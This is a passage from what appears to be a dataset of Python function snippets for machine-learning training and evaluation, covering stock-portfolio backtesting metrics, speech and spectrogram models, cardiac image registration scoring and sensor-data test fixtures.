columns=[\"Predicted\"]) # save predictions as a datafram column\r\n df['True'] = class_ids # save true class as a datafram column\r\n print(\"\\nPredicted:\", df)", "def test_model(predictions: np.array, configs: dict, folder_path: str, test_data_index: pd.Index,\n y_test: np.array,\n study_period_data: pd.DataFrame, parent_model_type: str = 'deep_learning', model_type: str = None,\n history=None, index_id='',\n index_name='', study_period_length: int = 0, model=None, period_range: tuple = (0, 0),\n start_date: datetime.date = datetime.date.today(), end_date: datetime.date = datetime.date.today(),\n get_val_score_only=False, weighting_criterion=None, plotting=False, market_logs=False, **kwargs):\n\n if get_val_score_only:\n # In case classifier is part of MixedEnsemble as is being validated\n y_test = y_test[kwargs['model_index']]\n test_data_index = test_data_index[kwargs['model_index']]\n print(f'\\nGetting validation score for {Style.BRIGHT}{Fore.BLUE}{model_type}{Style.RESET_ALL} ...')\n else:\n print(f'\\nTesting {Style.BRIGHT}{Fore.BLUE}{model_type}{Style.RESET_ALL} model on unseen data ...')\n\n # print(f'{Style.BRIGHT}{Fore.MAGENTA}Length of test data: {len(y_test)}{Style.RESET_ALL}')\n\n study_period_data = study_period_data.copy()\n y_test = y_test.copy()\n predictions = predictions.copy()\n\n timer = Timer().start()\n # JOB: Create data frame with true and predicted values\n if isinstance(test_data_index, pd.MultiIndex):\n test_set_comparison = pd.DataFrame({'y_test': y_test.astype('int8').flatten(), 'prediction': predictions},\n index=test_data_index)\n\n else:\n test_set_comparison = pd.DataFrame({'y_test': y_test.astype('int8').flatten(), 'prediction': predictions},\n index=pd.MultiIndex.from_tuples(test_data_index,\n names=['datadate', 'stock_id']))\n\n # JOB: Transform index of study period data to match test_set_comparison index\n study_period_data.index = study_period_data.index.tolist() # Flatten MultiIndex to tuples\n study_period_data.index.name = 'stock_id' # Rename index\n study_period_data.set_index('datadate', append=True, inplace=True)\n\n # JOB: Merge test set with study period data\n test_set_comparison = test_set_comparison.merge(study_period_data, how='left', left_index=True,\n right_on=['datadate', 'stock_id'])\n\n del study_period_data\n\n # JOB: Create normalized predictions (e.g., directional prediction relative to cross-sectional median of predictions)\n test_set_comparison.loc[:, 'norm_prediction'] = test_set_comparison.loc[:, 'prediction'].gt(\n test_set_comparison.groupby('datadate')['prediction'].transform('median')).astype(np.int16)\n\n # JOB: Create cross-sectional ranking\n test_set_comparison.loc[:, 'prediction_rank'] = test_set_comparison.groupby('datadate')['prediction'].rank(\n method='first', ascending=False).astype('int16')\n test_set_comparison.loc[:, 'prediction_percentile'] = test_set_comparison.groupby('datadate')['prediction'].rank(\n pct=True)\n\n test_data_start_date = test_set_comparison.index.get_level_values('datadate').min().date()\n test_data_end_date = test_set_comparison.index.get_level_values('datadate').max().date()\n test_set_n_days = test_set_comparison.index.get_level_values('datadate').unique().size\n test_set_n_constituents = test_set_comparison.index.get_level_values('stock_id').unique().size\n\n cross_section_size = int(round(test_set_comparison.groupby('datadate')['y_test'].count().mean()))\n print(f'Average size of cross sections: {int(cross_section_size)}')\n\n # Define top k values\n top_k_list = [5, 10]\n\n if 
cross_section_size > 30:\n top_k_list.extend([50, 100, 150, 200, 250])\n\n # JOB: Create empty dataframe for recording top-k accuracies\n top_k_metrics = pd.DataFrame()\n top_k_metrics.index.name = 'k'\n\n t_costs = 0.0005 # Set transaction costs per half-turn\n\n top_10_excess_return_series = None\n top_10_error_series = None\n market_return_series = None\n market_cum_returns = None\n market_metrics = None\n\n if not get_val_score_only:\n market_metrics, market_return_series, market_cum_returns = get_market_metrics(test_set_comparison,\n t_costs=t_costs,\n index_id=index_id,\n index_name=index_name,\n test_data_start_date=test_data_start_date,\n test_data_end_date=test_data_end_date,\n market_logs=market_logs)\n\n for top_k in top_k_list:\n # JOB: Filter test data by top/bottom k affiliation\n long_positions = test_set_comparison[test_set_comparison['prediction_rank'] <= top_k]\n short_positions = test_set_comparison[\n test_set_comparison['prediction_rank'] > test_set_comparison['cs_length'] - top_k]\n short_positions.loc[:, 'daily_return'] = - short_positions.loc[:, 'daily_return']\n\n full_portfolio = pd.concat([long_positions, short_positions], axis=0)\n\n if not get_val_score_only:\n if top_k == 5:\n # Get series of daily portfolio returns\n top_10_excess_return_series = calc_excess_returns(\n full_portfolio.groupby(level=['datadate'])['daily_return'].mean()).rename('daily_excess_return')\n top_10_excess_return_series = top_10_excess_return_series.reset_index()\n top_10_excess_return_series.loc[:, 'datadate'] = top_10_excess_return_series['datadate'].dt.strftime(\n '%Y-%m-%d')\n top_10_excess_return_series.set_index('datadate', inplace=True)\n\n sorted_portfolio = full_portfolio.set_index('prediction_rank', append=True, inplace=False)\n sorted_portfolio.reset_index(['stock_id'], inplace=True)\n sorted_portfolio.sort_index(level=['datadate', 'prediction_rank'], inplace=True)\n sorted_portfolio.reset_index(level='datadate', inplace=True, drop=True)\n top_10_error_series = (sorted_portfolio['norm_prediction'] - sorted_portfolio['y_test']).abs()\n top_10_error_series = top_10_error_series.values.tolist()\n\n cumulative_return = (top_10_excess_return_series.get('daily_excess_return') + 1).cumprod().rename(\n 'Cumulative Portfolio Return')\n cumulative_return.index.name = 'Time'\n\n if plotting:\n # Merge market and portfolio returns\n merged = pd.concat([cumulative_return, market_cum_returns], axis=1, join='outer')\n merged.plot()\n plt.legend(loc='best')\n plt.title(label=model_type)\n plt.show()\n\n annualized_sharpe = calc_sharpe(full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean(),\n annualize=True)\n annualized_sharpe_atc = calc_sharpe(\n full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean() - 4 * t_costs,\n annualize=True)\n annualized_sortino = calc_sortino(full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean(),\n annualize=True)\n annualized_sortino_atc = calc_sortino(\n full_portfolio.loc[:, ['daily_return']].groupby(level=['datadate']).mean() - 4 * t_costs,\n annualize=True)\n\n accuracy = None\n\n # JOB: Calculate accuracy score over all trades\n if parent_model_type == 'deep_learning':\n accuracy = binary_accuracy(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values).numpy()\n\n elif parent_model_type == 'tree_based':\n accuracy = accuracy_score(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values)\n\n elif parent_model_type == 'mixed':\n accuracy = 
accuracy_score(full_portfolio['y_test'].values,\n full_portfolio['norm_prediction'].values)\n\n mean_daily_return = full_portfolio.groupby(level=['datadate'])['daily_return'].mean().mean()\n\n mean_daily_excess_return = calc_excess_returns(\n full_portfolio.groupby(level=['datadate'])['daily_return'].mean().rename('daily_return')).mean()\n\n mean_daily_short = short_positions.groupby(level=['datadate'])['daily_return'].mean().mean()\n mean_daily_long = long_positions.groupby(level=['datadate'])['daily_return'].mean().mean()\n\n top_k_metrics.loc[top_k, 'Accuracy'] = accuracy\n top_k_metrics.loc[top_k, 'Mean Daily Return'] = mean_daily_return\n top_k_metrics.loc[top_k, 'Annualized Return'] = annualize_metric(mean_daily_return)\n top_k_metrics.loc[top_k, 'Mean Daily Excess Return'] = mean_daily_excess_return\n top_k_metrics.loc[top_k, 'Annualized Excess Return'] = annualize_metric(mean_daily_excess_return)\n top_k_metrics.loc[top_k, 'Annualized Sharpe'] = annualized_sharpe\n top_k_metrics.loc[top_k, 'Annualized Sortino'] = annualized_sortino\n top_k_metrics.loc[top_k, 'Mean Daily Return (Short)'] = mean_daily_short\n top_k_metrics.loc[top_k, 'Mean Daily Return (Long)'] = mean_daily_long\n\n # JOB: Add metrics incl. transaction costs of 5 bps per half-turn\n top_k_metrics.loc[top_k, 'Mean Daily Return_atc'] = mean_daily_return - 4 * t_costs\n top_k_metrics.loc[top_k, 'Annualized Return_atc'] = annualize_metric(mean_daily_return - 4 * t_costs)\n top_k_metrics.loc[top_k, 'Mean Daily Excess Return_atc'] = mean_daily_excess_return - 4 * t_costs\n top_k_metrics.loc[top_k, 'Annualized Excess Return_atc'] = annualize_metric(\n mean_daily_excess_return - 4 * t_costs)\n top_k_metrics.loc[top_k, 'Annualized Sharpe_atc'] = annualized_sharpe_atc\n top_k_metrics.loc[top_k, 'Annualized Sortino_atc'] = annualized_sortino_atc\n top_k_metrics.loc[top_k, 'Mean Daily Return (Short)_atc'] = mean_daily_short - 2 * t_costs\n top_k_metrics.loc[top_k, 'Mean Daily Return (Long)_atc'] = mean_daily_long - 2 * t_costs\n\n if get_val_score_only:\n print(f'{weighting_criterion} score: {round(top_k_metrics.loc[5, weighting_criterion], 4)}')\n return top_k_metrics.loc[5, weighting_criterion]\n\n top_k_metrics = pd.concat([top_k_metrics, market_metrics.to_frame().T], join='outer', verify_integrity=True)\n top_k_metrics.fillna('-', inplace=True)\n\n # JOB: Display top-k metrics\n pretty_print_table(top_k_metrics)\n\n # JOB: Plot accuracies and save figure to file\n if plotting:\n for col in top_k_metrics.columns:\n top_k_metrics[col].plot(kind='line', legend=True, fontsize=14)\n plt.savefig(os.path.join(ROOT_DIR, folder_path, f'top_k_{col.lower()}.png'), dpi=600)\n plt.show()\n\n if parent_model_type == 'deep_learning':\n # JOB: Plot training and validation metrics for LSTM\n try:\n plot_train_val(history, configs['model']['metrics'], store_png=True, folder_path=folder_path)\n except AttributeError as ae:\n print(f'{Fore.RED}{Style.BRIGHT}Plotting failed.{Style.RESET_ALL}')\n # print(ae)\n except UnboundLocalError as ule:\n print(\n f'{Fore.RED}{Back.YELLOW}{Style.BRIGHT}Plotting failed. 
History has not been created.{Style.RESET_ALL}')\n # print(ule)\n\n # JOB: Evaluate model on full test data\n test_score = None\n if parent_model_type == 'deep_learning':\n test_score = float(binary_accuracy(test_set_comparison['y_test'].values,\n test_set_comparison['norm_prediction'].values).numpy())\n\n print(f'\\nTest score on full test set: {float(np.round(test_score, 4))}')\n\n elif parent_model_type in ['tree_based', 'mixed']:\n test_score = accuracy_score(test_set_comparison['y_test'].values,\n test_set_comparison['norm_prediction'].values)\n print(f'\\nTest score on full test set: {np.round(test_score, 4)}')\n\n # pretty_print_table(\n # pd.DataFrame({'y_test': test_set_comparison['y_test'].values, 'norm_prediction': test_set_comparison[\n # 'norm_prediction'].values}).sample(100)) # TODO: Remove\n\n total_epochs = len(history.history['loss']) if history is not None else None\n\n # JOB: Fill dict for logging\n data_record = {\n 'ID': config.run_id,\n 'Experiment Run End': datetime.datetime.now().isoformat(),\n 'Parent Model Type': parent_model_type,\n 'Model Type': model_type,\n 'Index ID': index_id,\n 'Index Name': index_name,\n 'Study Period ID': config.study_period_id,\n 'Study Period Length': study_period_length,\n 'Period Range': period_range,\n 'Study Period Start Date': start_date.isoformat(),\n 'Study Period End Date': end_date.isoformat(),\n 'Test Set Size': y_test.shape[0],\n 'Days Test Set': test_set_n_days,\n 'Constituent Number': test_set_n_constituents,\n 'Average Cross Section Size': cross_section_size,\n 'Test Set Start Date': test_data_start_date.isoformat(),\n 'Test Set End Date': test_data_end_date.isoformat(),\n 'Total Accuracy': test_score,\n\n 'Top-k Accuracy Scores': top_k_metrics['Accuracy'].to_dict(),\n 'Top-k Mean Daily Return': top_k_metrics['Mean Daily Return'].to_dict(),\n 'Top-k Mean Daily Excess Return': top_k_metrics['Mean Daily Excess Return'].to_dict(),\n 'Top-k Annualized Excess Return': top_k_metrics['Annualized Excess Return'].to_dict(),\n 'Top-k Annualized Return': top_k_metrics['Annualized Return'].to_dict(),\n 'Top-k Annualized Sharpe': top_k_metrics['Annualized Sharpe'].to_dict(),\n 'Top-k Annualized Sortino': top_k_metrics['Annualized Sortino'].to_dict(),\n 'Mean Daily Return (Short)': top_k_metrics['Mean Daily Return (Short)'].to_dict(),\n 'Mean Daily Return (Long)': top_k_metrics['Mean Daily Return (Long)'].to_dict(),\n\n 'Top-k Mean Daily Return_atc': top_k_metrics['Mean Daily Return_atc'].to_dict(),\n 'Top-k Annualized Return_atc': top_k_metrics['Annualized Return_atc'].to_dict(),\n 'Top-k Mean Daily Excess Return_atc': top_k_metrics['Mean Daily Excess Return_atc'].to_dict(),\n 'Top-k Annualized Excess Return_atc': top_k_metrics['Annualized Excess Return_atc'].to_dict(),\n 'Top-k Annualized Sharpe_atc': top_k_metrics['Annualized Sharpe_atc'].to_dict(),\n 'Top-k Annualized Sortino_atc': top_k_metrics['Annualized Sortino_atc'].to_dict(),\n 'Top-k Mean Daily Return (Short)_atc': top_k_metrics['Mean Daily Return (Short)_atc'].to_dict(),\n 'Top-k Mean Daily Return (Long)_atc': top_k_metrics['Mean Daily Return (Long)_atc'].to_dict(),\n\n 'Model Configs': model.get_params(),\n 'Total Epochs': total_epochs,\n\n 'Return Series': top_10_excess_return_series['daily_excess_return'].to_dict(),\n 'Prediction Error': top_10_error_series\n }\n\n # JOB: Write to logs\n write_to_logs(data_record)\n\n print('Done testing on unseen data.')\n timer.stop()\n\n return top_10_error_series", "def main(args):\n dataset = MelSpectrogramDataset(args.dataset_file, 
args.label_file,\n args.context, None, device, None)\n\n # Split train and test datasets\n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n train_dataset, test_dataset = torch.utils.data.random_split(\n dataset, [train_size, test_size])\n train_loader = torch.utils.data.DataLoader(train_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n validation_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=args.batch_size,\n shuffle=args.shuffle,\n num_workers=0,\n pin_memory=False)\n\n model = get_model(args.model_name, dataset.vector_length).to(device)\n\n optimizer = getattr(torch.optim, args.optimizer)(model.parameters(),\n lr=args.lr,\n weight_decay=args.wd)\n\n loss_func = F.cross_entropy\n\n training_loss = []\n # Train\n for epoch in tqdm(range(args.num_epochs)):\n\n loss_epoch = []\n\n for input_vector, label in train_loader:\n label = label.to(dtype=torch.long,\n device=device,\n non_blocking=False)\n\n input_vector = input_vector.to(device, non_blocking=False)\n input_vector = input_vector.float()\n\n pred = model(input_vector).transpose(1, 2)\n\n optimizer.zero_grad()\n\n loss = loss_func(pred, label)\n\n loss.backward()\n\n optimizer.step()\n\n loss_epoch.append(loss.item())\n\n print(f\"Loss at epoch {epoch} is {sum(loss_epoch)/len(loss_epoch)}\")\n training_loss.append(sum(loss_epoch) / len(loss_epoch))\n validation_losses = validate(args, model, loss_func, validation_loader)\n\n # Graph training loss\n y_loss = np.array(training_loss)\n x_epochs = np.arange(1, len(y_loss) + 1)\n sns.set()\n loss_plot = sns.lineplot(x=x_epochs, y=y_loss)\n loss_plot.set(xlabel='Epoch', ylabel='Cross Entropy Loss')\n plt.title('Training Loss')\n plt.show()", "def train(self):\r\n self.speaker2index_and_index2speaker()\r\n \"\"\"Initialize history matrix\"\"\"\r\n self.history = np.random.normal(loc=0, scale=0.1, size=(len(self.s2i), config.train.class_history))\r\n \"\"\"\"\"\"\r\n \"\"\"\"\"\"\r\n iterations = 0\r\n \"\"\"Get train/test\"\"\"\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"CTC loss\"\"\"\r\n # self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='mean')\r\n self.ctc_loss = nn.CTCLoss(blank=p2c[config.data.PAD_token], reduction='none')\r\n for epoch in range(config.train.num_epochs):\r\n \"\"\"Make dataloader\"\"\"\r\n train_data = Dataset({'files': train, 'mode': 'train', 'metadata_help': metadata_help})\r\n train_gen = data.DataLoader(train_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=train_data.collate, drop_last=True)\r\n val_data = Dataset({'files': val, 'mode': 'train', 'metadata_help': metadata_help})\r\n val_gen = data.DataLoader(val_data, batch_size=config.train.batch_size,\r\n shuffle=True, collate_fn=val_data.collate, drop_last=True)\r\n\r\n for batch_number, features in enumerate(train_gen):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n input_lengths = features['input_lengths']\r\n target_lengths = features['target_lengths']\r\n metadata = features[\"metadata\"]\r\n batch_speakers = [x['speaker'] for x in 
metadata]\r\n self.G = self.G.train()\r\n\r\n #ipdb.set_trace()\r\n \"\"\"Make input_lengths and target_lengths torch ints\"\"\"\r\n input_lengths = input_lengths.to(torch.int32)\r\n target_lengths = target_lengths.to(torch.int32)\r\n phones = phones.to(torch.int32)\r\n\r\n outputs = self.G(spectrograms)\r\n\r\n outputs = outputs.permute(1, 0, 2) # swap batch and sequence length dimension for CTC loss\r\n\r\n loss = self.ctc_loss(log_probs=outputs, targets=phones,\r\n input_lengths=input_lengths, target_lengths=target_lengths)\r\n\r\n \"\"\"Update the loss history\"\"\"\r\n self.update_history(loss, batch_speakers)\r\n if epoch >= config.train.regular_epochs:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[0])\r\n else:\r\n loss_weights = self.get_loss_weights(batch_speakers, type=types[1])\r\n loss = loss * loss_weights\r\n\r\n # Backward and optimize.\r\n self.reset_grad()\r\n # loss.backward()\r\n loss.sum().backward()\r\n self.g_optimizer.step()\r\n\r\n if iterations % self.log_step == 0:\r\n print(str(iterations) + ', loss: ' + str(loss.sum().item()))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('loss', loss.sum().item(), iterations)\r\n\r\n if iterations % self.model_save_step == 0:\r\n \"\"\"Calculate validation loss\"\"\"\r\n val_loss = self.val_loss(val=val_gen, iterations=iterations)\r\n print(str(iterations) + ', val_loss: ' + str(val_loss))\r\n if self.use_tensorboard:\r\n self.logger.scalar_summary('val_loss', val_loss, iterations)\r\n \"\"\"Save model checkpoints.\"\"\"\r\n if iterations % self.model_save_step == 0:\r\n G_path = os.path.join(self.model_save_dir, '{}-G.ckpt'.format(iterations))\r\n torch.save({'model': self.G.state_dict(),\r\n 'optimizer': self.g_optimizer.state_dict()}, G_path)\r\n print('Saved model checkpoints into {}...'.format(self.model_save_dir))\r\n\r\n iterations += 1", "def test(model, dataloader, params, args, val):\n\n # evaluation mode\n model.eval()\n\n # initialise buffers\n dice_lv_buffer = []\n dice_myo_buffer = []\n dice_rv_buffer = []\n\n mcd_lv_buffer = []\n hd_lv_buffer = []\n mcd_myo_buffer = []\n hd_myo_buffer = []\n mcd_rv_buffer = []\n hd_rv_buffer = []\n\n mean_mag_grad_detJ_buffer = []\n negative_detJ_buffer = []\n\n\n with tqdm(total=len(dataloader)) as t:\n # iterate over validation subjects\n for idx, (image_ed_batch, image_es_batch, label_ed_batch, label_es_batch) in enumerate(dataloader):\n # (data all in shape of (c, N, H, W))\n\n # extend to (N, c, H, W)\n image_ed_batch = image_ed_batch.permute(1, 0, 2, 3).to(device=args.device)\n image_es_batch = image_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n label_es_batch = label_es_batch.permute(1, 0, 2, 3).to(device=args.device)\n\n with torch.no_grad():\n # compute optical flow and warped ED images towards ES\n dvf = model(image_ed_batch, image_es_batch)\n\n # transform label mask of ES frame\n warped_label_es_batch = resample_transform(label_es_batch.float(), dvf, interp='nearest')\n\n\n \"\"\" Move data to device \"\"\"\n if args.cuda:\n # move data to cpu to calculate metrics\n # (the axis permutation is to comply with metric calculation code which takes input shape H, W, N)\n warped_label_es_batch = warped_label_es_batch.squeeze(1).cpu().numpy().transpose(1, 2, 0)\n label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.cpu().numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n else:\n # CPU version of the code\n warped_label_es_batch = warped_label_es_batch.squeeze(1).numpy().transpose(1, 2, 0)\n 
label_ed_batch = label_ed_batch.squeeze(0).numpy().transpose(1, 2, 0)\n dvf = dvf.data.numpy().transpose(0, 2, 3, 1) # (N, H, W, 2)\n \"\"\"\"\"\"\n\n \"\"\" Calculate the metrics (only works with SAX images) \"\"\"\n # (optional) extract 3 slices (apical, mid-ventricle and basal)\n if not args.all_slices:\n num_slices = label_ed_batch.shape[-1]\n apical_idx = int(round((num_slices - 1) * 0.75)) # 75% from basal\n mid_ven_idx = int(round((num_slices - 1) * 0.5)) # 50% from basal\n basal_idx = int(round((num_slices - 1) * 0.25)) # 25% from basal\n slices_idx = [apical_idx, mid_ven_idx, basal_idx]\n\n warped_label_es_batch = warped_label_es_batch[:, :, slices_idx]\n label_ed_batch = label_ed_batch[:, :, slices_idx]\n dvf = dvf[slices_idx, :, :, :] # needed for detJac\n\n # dice\n dice_lv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=1)\n dice_myo = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=2)\n dice_rv = categorical_dice_stack(warped_label_es_batch, label_ed_batch, label_class=3)\n\n dice_lv_buffer += [dice_lv]\n dice_myo_buffer += [dice_myo]\n dice_rv_buffer += [dice_rv]\n\n # contour distances\n mcd_lv, hd_lv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=1, dx=params.pixel_size)\n mcd_myo, hd_myo = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=2, dx=params.pixel_size)\n mcd_rv, hd_rv = contour_distances_stack(warped_label_es_batch, label_ed_batch, label_class=3, dx=params.pixel_size)\n\n # determinant of Jacobian\n mean_grad_detJ, mean_negative_detJ = detJac_stack(dvf)\n\n\n # update buffers\n mcd_lv_buffer += [mcd_lv]\n hd_lv_buffer += [hd_lv]\n mcd_myo_buffer += [mcd_myo]\n hd_myo_buffer += [hd_myo]\n mcd_rv_buffer += [mcd_rv]\n hd_rv_buffer += [hd_rv]\n\n mean_mag_grad_detJ_buffer += [mean_grad_detJ]\n negative_detJ_buffer += [mean_negative_detJ]\n\n t.update()\n\n # construct metrics dict\n metrics = {'dice_lv_mean': np.mean(dice_lv_buffer), 'dice_lv_std': np.std(dice_lv_buffer),\n 'dice_myo_mean': np.mean(dice_myo_buffer), 'dice_myo_std': np.std(dice_myo_buffer),\n 'dice_rv_mean': np.mean(dice_rv_buffer), 'dice_rv_std': np.std(dice_rv_buffer),\n\n 'mcd_lv_mean': np.mean(mcd_lv_buffer), 'mcd_lv_std': np.std(mcd_lv_buffer),\n 'mcd_myo_mean': np.mean(mcd_myo_buffer), 'mcd_myo_std': np.std(mcd_myo_buffer),\n 'mcd_rv_mean': np.mean(mcd_rv_buffer), 'mcd_rv_std': np.std(mcd_rv_buffer),\n\n 'hd_lv_mean': np.mean(hd_lv_buffer), 'hd_lv_std': np.std(hd_lv_buffer),\n 'hd_myo_mean': np.mean(hd_myo_buffer), 'hd_myo_std': np.std(hd_myo_buffer),\n 'hd_rv_mean': np.mean(hd_rv_buffer), 'hd_rv_std': np.std(hd_rv_buffer),\n\n 'mean_mag_grad_detJ_mean': np.mean(mean_mag_grad_detJ_buffer),\n 'mean_mag_grad_detJ_std': np.std(mean_mag_grad_detJ_buffer),\n\n 'negative_detJ_mean': np.mean(negative_detJ_buffer),\n 'negative_detJ_std': np.std(negative_detJ_buffer)\n }\n\n\n if not val:\n # testing only: save all metrics evaluated for all test subjects in pandas dataframe\n test_result_dir = os.path.join(args.model_dir, \"test_results\")\n if not os.path.exists(test_result_dir):\n os.makedirs(test_result_dir)\n\n # save metrics results mean & std\n xutils.save_dict_to_json(metrics,\n f\"{test_result_dir}/test_results_3slices_{not args.all_slices}.json\")\n\n # save accuracy metrics of every subject\n subj_id_buffer = dataloader.dataset.dir_list\n df_buffer = []\n column_method = ['DL'] * len(subj_id_buffer)\n for struct in ['LV', 'MYO', 'RV']:\n if struct == 'LV':\n ls_dice = dice_lv_buffer\n 
ls_mcd = mcd_lv_buffer\n ls_hd = hd_lv_buffer\n elif struct == 'MYO':\n ls_dice = dice_myo_buffer\n ls_mcd = mcd_myo_buffer\n ls_hd = hd_myo_buffer\n elif struct == 'RV':\n ls_dice = dice_rv_buffer\n ls_mcd = mcd_rv_buffer\n ls_hd = hd_rv_buffer\n\n ls_struct = [struct] * len(subj_id_buffer)\n data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'Structure': ls_struct,\n 'Dice': ls_dice,\n 'MCD': ls_mcd,\n 'HD': ls_hd}\n df_buffer += [pd.DataFrame(data=data)]\n # concatenate df and save\n metrics_df = pd.concat(df_buffer, axis=0)\n metrics_df.to_pickle(f\"{test_result_dir}/test_accuracy_results_3slices_{not args.all_slices}.pkl\")\n\n # save detJac metrics for every subject\n jac_data = {'Method': column_method,\n 'ID': subj_id_buffer,\n 'GradDetJac': mean_mag_grad_detJ_buffer,\n 'NegDetJac': negative_detJ_buffer}\n jac_df = pd.DataFrame(data=jac_data)\n jac_df.to_pickle(f\"{test_result_dir}/test_Jacobian_results_3slices{not args.all_slices}.pkl\")\n\n return metrics", "def setup(cls):\n cls.logger = logging.getLogger('ModelTestLogger')\n cls.logger.setLevel(logging.DEBUG)\n\n s1 = model.Subject('subject1')\n s2 = model.Subject('subject2')\n\n cls.experiment = model.Experiment()\n cls.experiment.put_subject(s1)\n cls.experiment.put_subject(s2)\n\n setup1 = model.Setup(cls.experiment)\n modality1 = model.Modality(setup1, 20, 'emg')\n modality2 = model.Modality(setup1, 5, 'kin')\n\n model.Channel(modality1, 'brachoradialis')\n model.Channel(modality1, 'musculus sterno clavicularis')\n model.Channel(modality1, 'musculus rhombideus')\n model.Channel(modality1, 'musculus lattisimus')\n\n model.Channel(modality2, 'Pos-X')\n model.Channel(modality2, 'Pos-Y')\n model.Channel(modality2, 'Pos-Z')\n\n session1 = model.Session(cls.experiment, setup1, s1, 'session1')\n arr = np.column_stack((\n np.tile(\n np.concatenate((\n np.arange(0., 1., 0.1),\n np.arange(1., 0., -0.1)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(10),\n np.arange(10, 0, -1)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(0.0, 0.1, 0.01),\n np.arange(0.1, 0.0, -0.01)\n )),\n 10\n ),\n np.tile(\n np.concatenate((\n np.arange(0.5, 1.5, 0.1),\n np.arange(1.5, 0.5, -0.1)\n )),\n 10\n ),\n ))\n recording1 = model.Recording(session1, modality1, data=arr,\n identifier='emg_recording1')\n\n arr2 = np.column_stack((\n np.sum(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1),\n np.prod(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1),\n np.square(np.sum(np.mean(arr.reshape(-1, 4, 4), axis=1), axis=1))\n ))\n recording2 = model.Recording(session1, modality2, data=arr2,\n identifier='kin_recording1')\n for i in range(5):\n model.Trial(recording1, i * 2, 2)\n model.Trial(recording2, i * 2, 2)\n\n session2 = model.Session(cls.experiment, setup1, s2, 'session2')\n arr = np.add(arr, np.random.randn(*arr.shape))\n recording1 = model.Recording(session2, modality1, data=arr,\n identifier='emg_recording2')\n arr2 = np.column_stack((\n np.sin(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1))),\n np.cos(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1))),\n np.tan(np.mean(np.sum(arr.reshape(-1, 4, 4), axis=1)))\n ))\n recording2 = model.Recording(session2, modality2, data=arr2,\n identifier='kin_recording2')\n for i in range(5):\n model.Trial(recording1, i * 2, 2)\n model.Trial(recording2, i * 2, 2)", "def test():\n real_clusters, ei = create_clusters()\n real_data, labels, step_nb = create_emitter_comparison_with_cluster(\n real_clusters, ei)\n logger.info(labels)\n\n model = Sequential()\n model.add(LSTM(units=128, input_shape=(2, 
50)))\n model.add(Dense(1, activation=\"sigmoid\"))\n model.compile(loss='binary_crossentropy', optimizer='rmsprop', metrics=[\n 'accuracy', f1_score_threshold(), precision_threshold(), recall_threshold()])\n model.load_weights(WEIGHTS_DIR+'/my_model_clusters_weights.h5')\n\n to_predict = np.array(real_data)\n predictions = model.predict(to_predict)\n predictions = np.array([k[0] for k in predictions])\n\n labels = np.array(labels)\n thresholdlist = np.arange(50, 2000, 50)\n\n recall_0_list = []\n recall_1_list = []\n precision_0_list = []\n precision_1_list = []\n\n for k in thresholdlist:\n scores, true_predictions, true_labels = prediction_processing(\n predictions, labels, k, step_nb)\n recall_1_list.append(scores[0])\n recall_0_list.append(scores[1])\n precision_1_list.append(scores[2])\n precision_0_list.append(scores[3])\n fig = plt.figure(0)\n ax = fig.add_subplot(2, 1, 1)\n plt.plot(thresholdlist, recall_0_list, 'bo',\n thresholdlist, recall_1_list, 'ro')\n\n ax2 = fig.add_subplot(2, 1, 2)\n\n plt.plot(thresholdlist, precision_0_list, 'bo',\n thresholdlist, precision_1_list, 'ro')\n plt.show()", "def train_test_model_stream():\n train=learning.Train_kmer_clf()\n train.run()\n #with open(os.path.join(cfg.pathtoxp, cfg.xp_name, cfg.id, f'{cfg.model}_CVresults.pkl'), 'rb') as f:\n # dic=pickle.load(f)\n #test=learning.Test_streaming(batchsize=1, kmer_to_index=dic['features'], clf=dic['classifier'])\n test=learning.Test_streaming(batchsize=1, kmer_to_index=train.kmer_to_index, clf=train.cv_clf)\n test.run()", "def main():\r\n datasetrootdir, resultrootdir, modelrootdir, normal, mutant, savebinary, train_params = io_utils.arg_parse(\r\n 'Test LSTM')\r\n tag = normal + '_vs_' + mutant\r\n\r\n normal_dir_name = os.path.join(datasetrootdir, normal)\r\n mutant_dir_name = os.path.join(datasetrootdir, mutant)\r\n\r\n try:\r\n # load data of normal worms\r\n normal_data, normalfile = io_utils.get_data(os.path.join(normal_dir_name, const.featuredir))\r\n # normal_data = io_utils.normalize_list(normal_data, bias=0.1)\r\n # load data of mutant worms\r\n mutant_data, mutantfile = io_utils.get_data(os.path.join(mutant_dir_name, const.featuredir))\r\n # mutant_data = io_utils.normalize_list(mutant_data, bias=0.1)\r\n\r\n normal_data, mutant_data = 